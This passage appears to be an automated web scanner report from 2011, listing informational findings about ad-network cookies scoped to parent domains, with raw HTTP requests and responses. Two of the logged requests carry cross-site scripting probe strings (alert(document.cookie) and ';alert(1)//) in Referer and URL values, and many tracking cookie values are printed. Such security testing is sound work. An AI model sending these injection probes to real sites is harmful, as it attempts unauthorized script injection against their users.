Date: Fri, 28 Jan 2011 22:31:17 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011PiwJwO101yed8|O1021J48; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1415
Content-Type: application/x-javascript

document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldin
...[SNIP]...

10.130. http://syndication.mmismm.com/mmtnt.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://syndication.mmismm.com
Path:	/mmtnt.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

G=10120000000990801741; expires=Fri, 29-Jan-2016 03:57:39 GMT; path=/; domain=.mmismm.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mmtnt.php HTTP/1.1
Host: syndication.mmismm.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: G=10120000000990801741

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:39 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR BUS COM NAV"
Set-Cookie: G=10120000000990801741; expires=Fri, 29-Jan-2016 03:57:39 GMT; path=/; domain=.mmismm.com
Content-Length: 462
Content-Type: text/javascript

document.write('<script type="text/javascript">var D=new Date();var Z=D.getTimezoneOffset();var R="";if(typeof document.referrer!=="undefined"){R="&ref="+encodeURIComponent(document.referrer);}</'+'sc
...[SNIP]...

10.131. http://tag.contextweb.com/TAGPUBLISH/getad.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TAGPUBLISH/getad.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

V=gFEcJzqCjXJj; domain=.contextweb.com; expires=Sat, 28-Jan-2012 17:37:48 GMT; path=/
513102_300X250_50151=1/28/2011 12:37:49 PM; domain=.contextweb.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /TAGPUBLISH/getad.aspx?tagver=1&cd=1&if=0&ca=VIEWAD&cp=513102&ct=50151&cf=300X250&cn=1&rq=1&fldc=5&dw=1036&cwu=http%3A%2F%2Fevents.cbs6albany.com%2F%3F376e5%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253Ea7771aeaee3%3D1&mrnd=63109582 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B02%2F23%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9; cw=cw

Response

10.132. http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tap.rubiconproject.com
Path:	/oz/feeds/invite-media-rtb/tokens/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

cd=false; Domain=.rubiconproject.com; Expires=Sat, 28-Jan-2012 14:48:42 GMT; Path=/
lm="28 Jan 2011 14:48:42 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /oz/feeds/invite-media-rtb/tokens/?rt=iframe HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://assets.rubiconproject.com/static/rtb/sync-min.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; put_1986=4760492999213801733; put_1994=6ch47d7o8wtv; xdp_ti="26 Jan 2011 20:13:41 GMT"; lm="26 Jan 2011 20:13:41 GMT"; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; khaos=GIPAEQ2D-C-IOYY; put_1185=3011330574290390485; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; cd=false; dq=12|2|10|0; rdk2=0; ses2=7477^3; csi2=3178295.js^1^1296226112^1296226112&3138805.js^1^1296224077^1296224077; rdk=5804/7477; rdk15=0; ses15=7477^4; csi15=3174529.js^1^1296226115^1296226115&3187311.js^1^1296226114^1296226114&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; rpb=4214%3D1%264894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%264212%3D1%265328%3D1%264554%3D1%265671%3D1; put_2081=CA-00000000456885722

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 28 Jan 2011 14:48:42 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Location: http://pixel.invitemedia.com/rubicon_sync?publisher_user_id=004826d0e57cb7385266145a629ee0301cc82296&publisher_dsp_id=2101&publisher_call_type=iframe&publisher_redirecturl=http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/
Content-Length: 0
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Sat, 28-Jan-2012 14:48:42 GMT; Path=/
Set-Cookie: dq=13|3|10|0; Expires=Sat, 28-Jan-2012 14:48:42 GMT; Path=/
Set-Cookie: put_2101=""; Domain=.rubiconproject.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: lm="28 Jan 2011 14:48:42 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Connection: close
Content-Type: text/plain; charset=UTF-8

10.133. http://tap.rubiconproject.com/oz/sensor previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tap.rubiconproject.com
Path:	/oz/sensor

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

cd=false; Domain=.rubiconproject.com; Expires=Sat, 28-Jan-2012 17:06:05 GMT; Path=/
cd=false; Domain=.rubiconproject.com; Expires=Sat, 28-Jan-2012 17:06:05 GMT; Path=/
lm="28 Jan 2011 17:06:05 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /oz/sensor HTTP/1.1
Host: tap.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; lm="28 Jan 2011 14:48:45 GMT"; ses15=7477^8; put_2132=D8DB51BF08484217F5D14AB47F4002AD; xdp_ti="26 Jan 2011 20:13:41 GMT"; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1185=3011330574290390485; rdk15=0; rpb=4894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1%266073%3D1%264214%3D1; rdk=5804/7477; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_2081=CA-00000000456885722; csi15=3178300.js^1^1296232904^1296232904&3168345.js^1^1296232903^1296232903&3174529.js^2^1296226115^1296226129&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; dq=15|4|11|0; put_1994=6ch47d7o8wtv; SERVERID=; put_2100=usr3fd748acf5bcab14; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; khaos=GIPAEQ2D-C-IOYY; put_1197=3297869551067506954; au=GIP9HWY4-MADS-10.208.38.239; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; csi2=3174527.js^5^1296226121^1296232915&3138805.js^2^1296224077^1296226130&3178295.js^1^1296226112^1296226112; put_1986=4760492999213801733; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; rdk2=0; ses2=7477^9; cd=false;

Response

HTTP/1.1 204 No Content
Date: Fri, 28 Jan 2011 17:06:05 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Sat, 28-Jan-2012 17:06:05 GMT; Path=/
Set-Cookie: dq=16|4|12|0; Expires=Sat, 28-Jan-2012 17:06:05 GMT; Path=/
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Sat, 28-Jan-2012 17:06:05 GMT; Path=/
Set-Cookie: lm="28 Jan 2011 17:06:05 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

10.134. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tap.rubiconproject.com
Path:	/partner/agent/rubicon/channels.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

khaos=GIPAEQ2D-C-IOYY; Domain=.rubiconproject.com; Expires=Sat, 26-Jan-2019 16:41:56 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partner/agent/rubicon/channels.js?cb=oz_onPixelsLoaded&pc=5804/7477 HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://assets.nydailynews.com/cssb1a8f'%3balert(1)//59512309c7e/20090601/nydn_homepage.css
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1994=6ch47d7o8wtv; xdp_ti="26 Jan 2011 20:13:41 GMT"; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; khaos=GIPAEQ2D-C-IOYY; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_2081=CA-00000000456885722; lm="28 Jan 2011 14:48:45 GMT"; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; put_1185=3011330574290390485; put_1986=4760492999213801733; put_2132=D8DB51BF08484217F5D14AB47F4002AD; cd=false; dq=15|4|11|0; put_2100=usr3fd748acf5bcab14; ses15=7477^8; csi15=3178300.js^1^1296232904^1296232904&3168345.js^1^1296232903^1296232903&3174529.js^2^1296226115^1296226129&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; rpb=4894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1%266073%3D1%264214%3D1; put_1197=3297869551067506954; rdk=5804/7477; rdk2=0; ses2=7477^9; csi2=3174527.js^5^1296226121^1296232915&3138805.js^2^1296224077^1296226130&3178295.js^1^1296226112^1296226112

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:41:56 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/javascript;charset=UTF-8
Content-Length: 943
Cache-control: private
Set-Cookie: khaos=GIPAEQ2D-C-IOYY; Domain=.rubiconproject.com; Expires=Sat, 26-Jan-2019 16:41:56 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Connection: close

var oo_profile={
tokenType : "0",
tracking : "",
tags : "Education,Beauty,Family and Parenting,Hobbies and Interests,Travel and Tourism High Affinity,Swing Voters",
tagcloud : [
{ tag
...[SNIP]...

10.135. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/click.txt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://this.content.served.by.adshuffle.com
Path:	/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/click.txt

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ac1=51f37.693f3=0128111941; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0|c51F37:693F3_0_0_0_20B69D_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/click.txt HTTP/1.1
Host: this.content.served.by.adshuffle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=43118469-708a-43ea-a596-af6467b86b10; v=576462396875340721; ts=1/29/2011+12:42:58+AM; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0; vc=; z=4; NSC_betivggmf-opef=ffffffff0908150045525d5f4f58455e445a4a423660;

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache="Set-Cookie"
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 01:41:09 GMT
Location: http://search.mylife.com/wp-wsfy?s_cid=$208$DISd42f2251fd9347828c931695680ca71619a6ca0eeddb444d9be1d8e2a327f4b1
Server: Microsoft-IIS/7.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: ac1=51f37.693f3=0128111941; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0|c51F37:693F3_0_0_0_20B69D_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Date: Sat, 29 Jan 2011 01:41:08 GMT
Content-Length: 228
Set-Cookie: NSC_betivggmf-opef=ffffffff0908150045525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 01:46:09 GMT;path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://search.mylife.com/wp-wsfy?s_cid=$208$DISd42f2251fd9347828c931695680ca71619a6ca0eeddb444d9be1d8e2a327f4b1">here
...[SNIP]...

10.136. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/view.pxl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://this.content.served.by.adshuffle.com
Path:	/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/view.pxl

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

sid=43118469-708a-43ea-a596-af6467b86b10; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/view.pxl?_ADTIME_ HTTP/1.1
Host: this.content.served.by.adshuffle.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v=576462396875340721; ts=1/29/2011+12:42:58+AM; z=4; sid=92c5b080-0b3b-470a-b91d-cc22156a51a6; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.6292a=0128111842; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:6292A_0_0_0_20B662_0_0

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache="Set-Cookie"
Pragma: no-cache
Content-Type: text/html
Expires: Sat, 29 Jan 2011 00:59:18 GMT
Server: Microsoft-IIS/7.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: sid=43118469-708a-43ea-a596-af6467b86b10; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vc=; domain=by.adshuffle.com; expires=Tue, 01-Jan-1980 06:00:00 GMT; path=/
Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Date: Sat, 29 Jan 2011 00:59:18 GMT
Content-Length: 43
Set-Cookie: NSC_betivggmf-opef=ffffffff0908150045525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 01:04:18 GMT;path=/

GIF89a.............!.......,...........D..;

10.137. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://this.content.served.by.adshuffle.com
Path:	/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ac1=51f37.6292a=0128111941; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111939; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B69B_0_0|c51F37:6292A_0_0_0_20B69D_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.138. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/view.pxl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://this.content.served.by.adshuffle.com
Path:	/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/view.pxl

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ts=1/29/2011+12:42:58+AM; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
sid=92c5b080-0b3b-470a-b91d-cc22156a51a6; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.6292a=0128111842; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:6292A_0_0_0_20B662_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/view.pxl?_ADTIME_ HTTP/1.1
Host: this.content.served.by.adshuffle.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v=576462396875340721; ts=1/8/2011+3:06:08+AM; z=4; sid=9ceb3417-a6c7-439a-a223-e9ad8d9afb02; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache="Set-Cookie"
Pragma: no-cache
Content-Type: text/html
Expires: Sat, 29 Jan 2011 00:42:58 GMT
Server: Microsoft-IIS/7.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: ts=1/29/2011+12:42:58+AM; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: z=4; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: sid=92c5b080-0b3b-470a-b91d-cc22156a51a6; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vc=; domain=by.adshuffle.com; expires=Tue, 01-Jan-1980 06:00:00 GMT; path=/
Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.6292a=0128111842; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:6292A_0_0_0_20B662_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Date: Sat, 29 Jan 2011 00:42:57 GMT
Content-Length: 43
Set-Cookie: NSC_betivggmf-opef=ffffffff0908150145525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 00:47:58 GMT;path=/

GIF89a.............!.......,...........D..;

10.139. http://voken.eyereturn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://voken.eyereturn.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

er_guid=AB15549D-BD77-4F41-E5E1-E44D3AF016E4; Domain=.eyereturn.com; Expires=Sun, 27-Jan-2013 23:48:59 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?233369&click=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000943794/cstr=758797=_4d43560a,8830366303,766159^943794^1183^0,1_/xsxdata=$xsxdata/bnum=758797/optn=64?trg=&params=8830366303 HTTP/1.1
Host: voken.eyereturn.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID PSAo PSDa OUR STP IND UNI COM NAV"
Set-Cookie: cmggl=1; Domain=.eyereturn.com; Expires=Sun, 27-Feb-2011 23:48:59 GMT; Path=/
